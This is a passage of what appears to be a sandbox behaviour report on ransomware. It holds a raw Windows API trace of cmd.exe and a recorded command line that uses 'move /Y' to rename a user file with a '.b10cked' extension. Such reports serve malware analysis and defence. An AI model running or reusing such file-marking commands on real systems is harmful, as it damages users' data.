(in: hFindFile=0x1b0018 | out: hFindFile=0x1b0018) returned 1 [0203.158] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f20c | out: lpFindFileData=0x14f20c) returned 0x1b0018 [0203.158] FindClose (in: hFindFile=0x1b0018 | out: hFindFile=0x1b0018) returned 1 [0203.158] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0203.158] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0203.158] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0203.158] GetEnvironmentStringsW () returned 0x1b2af8* [0203.158] FreeEnvironmentStringsW (penv=0x1b2af8) returned 1 [0203.158] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0203.159] GetConsoleOutputCP () returned 0x1b5 [0203.159] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0203.159] GetUserDefaultLCID () returned 0x409 [0203.159] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0203.159] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f5d0, cchData=128 | out: lpLCData="0") returned 2 [0203.159] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f5d0, cchData=128 | out: lpLCData="0") returned 2 [0203.159] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f5d0, cchData=128 | out: lpLCData="1") returned 2 [0203.159] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0203.159] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0203.160] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0203.160] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0203.160] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0203.160] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0203.160] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0203.160] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0203.160] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0203.160] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0203.160] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0203.160] GetConsoleTitleW (in: lpConsoleTitle=0x1a08e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.161] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0203.161] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0203.161] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0203.161] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0203.161] _wcsicmp (_String1="move", _String2=")") returned 68 [0203.161] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0203.161] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0203.161] _wcsicmp (_String1="IF", _String2="move") returned -4 [0203.162] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0203.162] _wcsicmp (_String1="REM", _String2="move") returned 5 [0203.162] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0203.164] GetConsoleTitleW (in: lpConsoleTitle=0x14f2c8, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.164] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0203.164] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0203.164] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0203.164] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0203.164] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0203.164] _wcsicmp (_String1="move", _String2="CD") returned 10 [0203.164] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0203.165] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0203.165] _wcsicmp (_String1="move", _String2="REN") returned -5 [0203.165] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0203.165] _wcsicmp (_String1="move", _String2="SET") returned -6 [0203.165] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0203.165] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0203.165] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0203.165] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0203.165] _wcsicmp (_String1="move", _String2="MD") returned 11 [0203.165] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0203.165] _wcsicmp (_String1="move", _String2="RD") returned -5 [0203.165] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0203.165] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0203.165] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0203.165] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0203.165] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0203.165] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0203.165] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0203.165] _wcsicmp (_String1="move", _String2="VER") returned -9 [0203.165] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0203.165] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0203.165] _wcsicmp (_String1="move", _String2="SETLOCAL") returned 
-6 [0203.165] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0203.165] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0203.165] _wcsicmp (_String1="move", _String2="START") returned -6 [0203.165] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0203.165] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0203.165] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0203.166] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.167] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.167] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14f084, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x14f07c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14f07c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", 
_MaxCount=0x7) returned -11 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0203.168] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0203.168] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0203.168] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0203.168] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0203.168] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0203.168] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0203.168] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0203.168] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0203.168] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0203.168] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0203.168] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0203.168] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0203.168] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0203.168] _wcsicmp (_String1="MSINFO~1.HXN", _String2=".") returned 63 [0203.168] _wcsicmp 
(_String1="MSINFO~1.HXN", _String2="..") returned 63 [0203.168] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msinfo~1.hxn")) returned 0x2022 [0203.168] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1b1e48 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0203.168] SetErrorMode (uMode=0x0) returned 0x0 [0203.169] SetErrorMode (uMode=0x1) returned 0x0 [0203.169] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN", nBufferLength=0x104, lpBuffer=0x14ea0c, lpFilePart=0x14e9f4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN", lpFilePart=0x14e9f4*="MSINFO~1.HXN") returned 0x27 [0203.169] SetErrorMode (uMode=0x0) returned 0x1 [0203.169] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0203.169] _wcsicmp (_String1="MSINFO~1.HXN", _String2=".") returned 63 [0203.169] _wcsicmp (_String1="MSINFO~1.HXN", _String2="..") returned 63 [0203.169] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msinfo~1.hxn")) returned 0x2022 [0203.169] SetErrorMode (uMode=0x0) returned 0x0 [0203.169] SetErrorMode (uMode=0x1) returned 0x0 [0203.169] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN", nBufferLength=0x104, lpBuffer=0x14ee88, lpFilePart=0x14ec20 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN", lpFilePart=0x14ec20*="MSINFO~1.HXN") returned 0x27 [0203.169] SetErrorMode (uMode=0x0) returned 0x1 [0203.169] SetErrorMode (uMode=0x0) returned 0x0 [0203.169] SetErrorMode (uMode=0x1) returned 0x0 [0203.169] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATH.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x14f090, lpFilePart=0x14ec20 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATH.14.1033.hxn.b10cked", 
lpFilePart=0x14ec20*="MS.INFOPATH.14.1033.hxn.b10cked") returned 0x3a [0203.169] SetErrorMode (uMode=0x0) returned 0x1 [0203.169] SetLastError (dwErrCode=0x0) [0203.169] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATH.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.infopath.14.1033.hxn.b10cked")) returned 0xffffffff [0203.169] GetLastError () returned 0x2 [0203.169] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x14e59c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e59c) returned 0x1a0e78 [0203.170] FindNextFileW (in: hFindFile=0x1a0e78, lpFindFileData=0x14e59c | out: lpFindFileData=0x14e59c) returned 0 [0203.170] FindClose (in: hFindFile=0x1a0e78 | out: hFindFile=0x1a0e78) returned 1 [0203.170] GetLastError () returned 0x12 [0203.170] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x14e59c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e59c) returned 0x1a0e78 [0203.170] FindNextFileW (in: hFindFile=0x1a0e78, lpFindFileData=0x14e59c | out: lpFindFileData=0x14e59c) returned 0 [0203.170] FindClose (in: hFindFile=0x1a0e78 | out: hFindFile=0x1a0e78) returned 1 [0203.170] GetLastError () returned 0x12 [0203.200] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x1b1be8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1b1be8) returned 0x1a0e78 [0203.200] FindNextFileW (in: hFindFile=0x1a0e78, lpFindFileData=0x1b1be8 | out: lpFindFileData=0x1b1be8) returned 0 [0203.200] FindClose (in: hFindFile=0x1a0e78 | out: hFindFile=0x1a0e78) returned 1 [0203.200] GetLastError () returned 0x12 [0203.200] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x1b1be8, 
fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1b1be8) returned 0x1a0e78 [0203.200] FindNextFileW (in: hFindFile=0x1a0e78, lpFindFileData=0x1b1be8 | out: lpFindFileData=0x1b1be8) returned 0 [0203.201] FindClose (in: hFindFile=0x1a0e78 | out: hFindFile=0x1a0e78) returned 1 [0203.203] GetLastError () returned 0x12 [0203.203] _get_osfhandle (_FileHandle=2) returned 0xb [0203.203] GetFileType (hFile=0xb) returned 0x2 [0203.203] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0203.203] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14e76c | out: lpMode=0x14e76c) returned 1 [0203.203] _get_osfhandle (_FileHandle=2) returned 0xb [0203.203] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x14e7a0 | out: lpConsoleScreenBufferInfo=0x14e7a0) returned 1 [0203.203] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0203.204] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x14e7e0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0203.205] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x14e7c4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14e7c4*=0x2c) returned 1 [0203.205] longjmp () [0203.205] _get_osfhandle (_FileHandle=1) returned 0x7 [0203.205] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0203.205] _get_osfhandle (_FileHandle=1) returned 0x7 [0203.205] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0203.205] _get_osfhandle (_FileHandle=0) returned 0x3 [0203.205] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0203.205] 
SetConsoleInputExeNameW () returned 0x1 [0203.205] GetConsoleOutputCP () returned 0x1b5 [0203.205] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0203.205] SetThreadUILanguage (LangId=0x0) returned 0x409 [0203.206] exit (_Code=1) Process: id = "463" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16920" os_pid = "0xc5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATHEDITOR.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29216 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29217 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29218 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29219 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 29220 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id 
= 29221 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29222 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29223 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29224 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 29225 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30039 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30040 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30041 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30042 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 30043 start_va = 0x550000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 30044 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30045 
start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30046 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30047 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30048 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30049 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30050 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30051 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30052 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30053 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 30054 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = 
mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30055 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30056 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 30057 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 30058 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 30059 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 30060 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 30061 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 30062 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 30118 start_va = 0x12d0000 end_va = 0x138ffff entry_point = 0x12d0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 659 os_tid = 0xcd0 [0203.076] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fe24 | out: lpSystemTimeAsFileTime=0x22fe24*(dwLowDateTime=0xaddb4c60, dwHighDateTime=0x1d440a9)) [0203.076] GetCurrentProcessId () returned 0xc5c [0203.076] GetCurrentThreadId () returned 0xcd0 [0203.076] GetTickCount () 
returned 0x394a0 [0203.076] QueryPerformanceCounter (in: lpPerformanceCount=0x22fe1c | out: lpPerformanceCount=0x22fe1c*=25986555308) returned 1 [0203.077] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0203.077] __set_app_type (_Type=0x1) [0203.077] __p__fmode () returned 0x76b331f4 [0203.077] __p__commode () returned 0x76b331fc [0203.077] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0203.077] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0203.077] GetCurrentThreadId () returned 0xcd0 [0203.077] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcd0) returned 0x38 [0203.077] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0203.077] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0203.077] SetThreadUILanguage (LangId=0x0) returned 0x409 [0203.078] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0203.078] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fdb4 | out: phkResult=0x22fdb4*=0x0) returned 0x2 [0203.078] VirtualQuery (in: lpAddress=0x22fdeb, lpBuffer=0x22fd84, dwLength=0x1c | out: lpBuffer=0x22fd84*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.078] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fd84, dwLength=0x1c | out: lpBuffer=0x22fd84*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0203.078] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fd84, dwLength=0x1c | out: lpBuffer=0x22fd84*(BaseAddress=0x131000, 
AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0203.078] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fd84, dwLength=0x1c | out: lpBuffer=0x22fd84*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.078] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fd84, dwLength=0x1c | out: lpBuffer=0x22fd84*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0203.078] GetConsoleOutputCP () returned 0x1b5 [0203.078] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0203.078] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 